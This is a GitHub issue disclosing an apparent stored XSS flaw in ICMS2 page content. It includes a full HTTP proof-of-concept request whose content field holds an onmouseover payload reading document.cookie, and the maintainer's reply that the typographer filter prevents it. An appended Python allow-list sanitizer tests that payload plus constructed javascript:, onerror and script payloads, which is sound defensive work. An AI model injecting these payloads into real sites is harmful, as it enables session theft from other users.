instantsoft / icms2

Self-hosted Site Management System
https://instantcms.ru
GNU General Public License v2.0

Cross Site Scripting in Page Content #1487

Closed sahildari closed 9 months ago

sahildari commented 9 months ago

I found cross-site scripting in ICMS2 v2.16.2 in the page content. I tried to report it via https://huntr.dev but was unable to do so, so I wanted to report it to you directly.

Description

XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user.

Proof of Concept

Video POC

POST /icms2-2.16.2/pages/add HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------38911908221886912813993829425
Content-Length: 1267
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/icms2-2.16.2/pages/add
Cookie: ICMS65939A02407AE=96b80f1rcli1jite9uomcsv1gd; icms[device_type]=desktop; icms[guest_date_log]=1704172417; PHPSESSID=59d44rvcfcftvlt2fptds4fklm; icms[users_tree_path]=%2F0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------38911908221886912813993829425
Content-Disposition: form-data; name="csrf_token"

a530434ba49ce4e7eca39e24e48abda6ba81d51acd27bd1b98261bd20395471d
-----------------------------38911908221886912813993829425
Content-Disposition: form-data; name="title"

xss1
-----------------------------38911908221886912813993829425
Content-Disposition: form-data; name="content"

<h1 onmouseover=confirm(document.cookie)>this is a demo xss page</h1>
-----------------------------38911908221886912813993829425
Content-Disposition: form-data; name="attach"; filename=""
Content-Type: application/octet-stream

-----------------------------38911908221886912813993829425
Content-Disposition: form-data; name="attach"

-----------------------------38911908221886912813993829425
Content-Disposition: form-data; name="slug"

xss1
-----------------------------38911908221886912813993829425
Content-Disposition: form-data; name="is_private"

0
-----------------------------38911908221886912813993829425
Content-Disposition: form-data; name="is_pub"

1
-----------------------------38911908221886912813993829425
Content-Disposition: form-data; name="submit"

Save
-----------------------------38911908221886912813993829425--
fuzegit commented 9 months ago

It is not a vulnerability. Enable typographer in the field settings.


I don't know why huntr.dev won't let you add a report
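The exchange above comes down to one point: the `content` field in the PoC is stored and rendered as raw HTML, so an `onmouseover` handler on an `<h1>` survives, and the maintainer's answer is that the field should be run through a filter ("typographer") rather than saved verbatim. The following is an added example, not code from the ICMS2 project or from either commenter: a small allow-list HTML sanitizer in Python that shows what such a filter has to do to the exact payload from the PoC (drop every `on*` event-handler attribute, drop attributes and tags not on the allow list, and refuse `javascript:` URLs in `href`). The tag and attribute allow lists, the `sanitize` function and the extra payloads beyond the one in the PoC are assumptions made for the example.

```python
import html
import re
from html.parser import HTMLParser

# Allow list for a "page content" field (assumption for this example; ICMS2's
# own typographer settings are not reproduced here). Anything not listed is dropped.
ALLOWED_TAGS = {"p", "h1", "h2", "h3", "b", "strong", "i", "em",
                "a", "ul", "ol", "li", "br", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
VOID_TAGS = {"br"}
# Only these URL schemes/forms are accepted in href; "javascript:" never matches.
SAFE_URL = re.compile(r"^(https?:|mailto:|/|#)", re.IGNORECASE)


class AllowListSanitizer(HTMLParser):
    """Rebuilds an HTML fragment keeping only allow-listed tags/attributes.

    Text content is always re-escaped, so even the body of a dropped
    <script> tag comes out as inert text rather than executable markup.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []  # (tag, attribute-or-None) pairs removed, for logging/audit

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append((tag, None))
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            # Event handlers (onmouseover, onerror, onload, ...) are never allowed,
            # whatever the tag; this is the attribute the PoC relies on.
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append((tag, name))
                continue
            if name == "href" and not SAFE_URL.match(value.strip()):
                self.dropped.append((tag, name))
                continue
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        # Re-escape text so stray "<" or "&" in content cannot reopen markup.
        self.out.append(html.escape(data, quote=False))


def sanitize(fragment):
    """Return (clean_html, dropped) for an untrusted HTML fragment."""
    parser = AllowListSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out), parser.dropped


# The payload from the PoC request's "content" field, plus two constructed
# variants of the same class of input (not from the original report).
POC_CONTENT = "<h1 onmouseover=confirm(document.cookie)>this is a demo xss page</h1>"
CONSTRUCTED_PAYLOADS = [
    '<a href="javascript:alert(1)">click</a>',
    "<img src=x onerror=alert(1)><script>alert(2)</script>",
]

if __name__ == "__main__":
    for raw in [POC_CONTENT] + CONSTRUCTED_PAYLOADS:
        clean, dropped = sanitize(raw)
        print("IN :", raw)
        print("OUT:", clean)
        print("DROPPED:", dropped)
        print()
```

Run on the PoC payload, the sanitizer keeps the `<h1>` but removes `onmouseover`, which is exactly the difference between a harmless heading and a stored XSS trigger; the `dropped` list is worth logging, because a user whose saved content repeatedly loses `on*` attributes or `javascript:` links is a signal worth alerting on.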